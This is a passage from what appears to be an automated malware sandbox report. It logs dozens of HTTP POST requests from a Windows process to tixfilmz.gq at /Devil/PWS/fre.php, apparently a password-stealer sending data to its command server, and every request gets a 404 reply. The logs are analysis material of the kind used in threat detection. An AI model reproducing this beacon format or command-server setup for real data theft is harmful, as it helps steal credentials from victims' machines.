                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:38.459871054 CEST8100INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FhTvEJmUxdlBdtgZfnodLReacuCGVKe2uoOMZPYIPhRqxUJZk7yozeMUpPRCr%2Bno%2BMXmxvqCj1pmNMTB0ZrxKAYncxbZXxFGbxoScHN6nlzyyk7J3BJfEeZnmtjjew%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fbcdd64bbaf-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  55192.168.2.349853188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:40.660156012 CEST8101OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:40.763823032 CEST8102INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gNwebsyEgMDFNhgjG0aRbZLoCte8tvTShOPR1oOzqrpkSBVA%2B8GMne7vTM2AEkRTl8uZA1OYnbLyaLFEiKWFoYzXm0YX9AfMVJ1bZU%2BPZtt1Kjdimycri3H0IvcvVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fcb2c189bca-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  56192.168.2.349859188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:42.759258032 CEST8114OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:42.876914978 CEST8116INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4RvVy60nLA3v4HrKzZYfrW4%2F3xt%2FiU2kLkJlk74mT%2BhWITlwXhRN8mLONVm9B9%2BpoJPvWSXpKZbbzfthOx3UBUhltFhK9uBRynyAbFJZCed0Vmv0M8SFZqLtCsynNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fd8497d9189-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  57192.168.2.349867188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:45.824251890 CEST9805OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:45.919315100 CEST9808INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pbflkE4kDEMCE6ymUD403N1kU66oVIP%2F3IVv0%2F5V%2Flzq97z7yxanXvWuJ0G3qXFpIpWgBJ45067X6olyX3AGKL3fenmvhXUS47uSbrWlJx2YiIWIKyESFSExnqX1xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4feb6a909ba7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  58192.168.2.349875188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:47.334573030 CEST9822OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:47.447091103 CEST9823INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VaUye4N1FNqUlwpBToxQO7gC5LHWHfn%2Fr2K2nOqmQYNTaFvaW7EMwrHDZUuO0kFWYbzEazhFdrNGB0hYcDJvRXYn6FK%2Fr4JSI3k2qfDn3u%2BSwtdXQrZk4fiIQWHIBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ff4dc5cbbc2-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  59192.168.2.349879188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:48.403290033 CEST9833OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:48.498898983 CEST9834INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lQFtwGGU3Dkg98O%2BQCp%2FzXuHQRQFBA4HyDpgZtFCPViawmosXQH71RqlUE19EbzNIVbeLBILNkUCH%2BKqp1baijUopAMHfIOgdYQNUi3TzDIaGl7BAcxGWoTEbPx5Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ffb8eff924f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.349748188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:19.613256931 CEST1037OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:19.732111931 CEST1038INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=56rajt1WPGe6KnsyYpZpLkWvcP2gK8oIufFApjC%2FlsRIRyLWAm0lgxAy74kgONnMisbKHxHnGCoj54gIwS1elPMY2YeNpmVi5jQ8TAhhFOqYDjKiWLZCRQTUqZHBNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dd09aad6940-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  60192.168.2.349881188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:50.015660048 CEST9837OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:50.116230011 CEST9838INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yYs5xGZmn0bbEItP9NqwtmTWoqccfvVeGOdajUor7qMWqijvuJJLkrQMHxpH8hh9w4yik0jbeNva2SzL%2FpuC12ECQYgANqYXeelmanIviQ3Pe3jNt%2BOhtQ1xoWS%2Bvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50059fa290a3-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  61192.168.2.349882188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:51.663594961 CEST9839OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:51.756084919 CEST9840INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N7Z3F0l4w%2FyGCWf%2BXM%2BApLe4jGBa6XF%2FUnI1FFrvY7eYRDEMdMyPlNFbsT35j3%2FEqDNEMwT%2F1ao0H%2Br7Nhk1WJUkgVYyRYMHFXsgqbZQMRiG3YeVxGXyCoc%2BxQUsXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e500fe9db9b71-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  62192.168.2.349883188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:53.308239937 CEST9841OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:53.422276974 CEST9842INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Fd17Zb%2BwPjA3E0zM9dfJ7XwwRlkas9438HGfYUUM0esuZPTVvVDG8CPTnIQGu3bO%2BbJasJNEsA4X1MXNU84ARiXnOa9ZuTJ06F2NFelnoaAx%2FZjEyhaBKlZ%2BrGLLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e501a3ea19c04-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  63192.168.2.349884188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:54.330408096 CEST9843OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:54.443857908 CEST9844INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=En0ibOgeEuMxY2mpHD2Dt3TdC47cwr0p%2B%2FkxieOBFGmpgV0W8IYvn3FdaUu5Dw3eYi89xBOfLEzFvGaVkysT4VQaqP1FJy4AkZCJvdsml9EBR6cH68soksbWjOz2PA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50209b4692a5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  64192.168.2.349885188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:55.376396894 CEST9845OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:55.477446079 CEST9846INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fRCqN%2B0U%2FIaJlKXxZ0j9RFyfBV2nGu%2Bs3z%2FsZN0sUZyIfeketjJylXcTToil1dlVsJcfYulWZ7AN3gENYb6%2FnTXhsn7WqZfUwLPIOGO3aDtBG%2FjPde0X6n6l2WwZjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50272bba9060-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  65192.168.2.349887188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:58.405291080 CEST9855OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:58.521328926 CEST9856INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSagRcg%2BXgMM8SLs1fz1sWSt3bmnwStUi%2B9W77wP9McJbCEncWHNRPxRcBP2MEeo4%2BG9DAV%2FyOHi%2Fg70bNZbQEebuoYORKyhvSDwkCg7bgb%2B5KBhVvZvlLt%2BS3qCOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e503a0f0c9b1f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  66192.168.2.349888188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:00.133245945 CEST9857OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:00.224335909 CEST9858INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCIohsXjHhgi0pQExP2v8aaRoEpTkgH8DUsDtSscarAKN6sCn7smeeWy9hlvBjh8%2BS%2BX1zapu%2B5%2BOZP8efkqrsyWJ3QvXrzyY9TiWrZ%2Fxe%2BhhcbnerbQyw2nP%2BtpFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5044da06bba7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  67192.168.2.349889188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:01.764744997 CEST9859OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:01.874361038 CEST9860INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pqVP65brrqjsnWByoTI7h%2Beihew4kemEjFaRp39wYal1iwPuhR1mCslnHhL%2BGO7wotp5gPYsoPk9QiiY2rKGIlyolfTNGFDDREhFvp96JrTmCIzOCv6%2Bf2d%2BAnEuOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e504f0ca29140-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  68192.168.2.349890188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:03.457386971 CEST9861OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:03.564661026 CEST9862INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5059ae8c9018-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  69192.168.2.349892188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:04.916627884 CEST9866OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:05.023818016 CEST9867INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5062ceb69128-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.349749188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:20.745320082 CEST1039OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:20.839010000 CEST1040INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ut9B7mf4G17zu3N9HtfdKLQB4vnnYZyFkcj3DiKeaTp6lkOkH0%2BG1RXZfAd1eHXyrbhOy35lhzComx8GvR8btMp2ypwuCSvqRR%2BPT%2FdC4VdZgby%2Bxpk5t%2BA4Fic1SA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dd7aae99225-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  70192.168.2.349895188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:06.157277107 CEST9877OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:06.249001026 CEST9878INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e506a89e19271-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  71192.168.2.349896188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
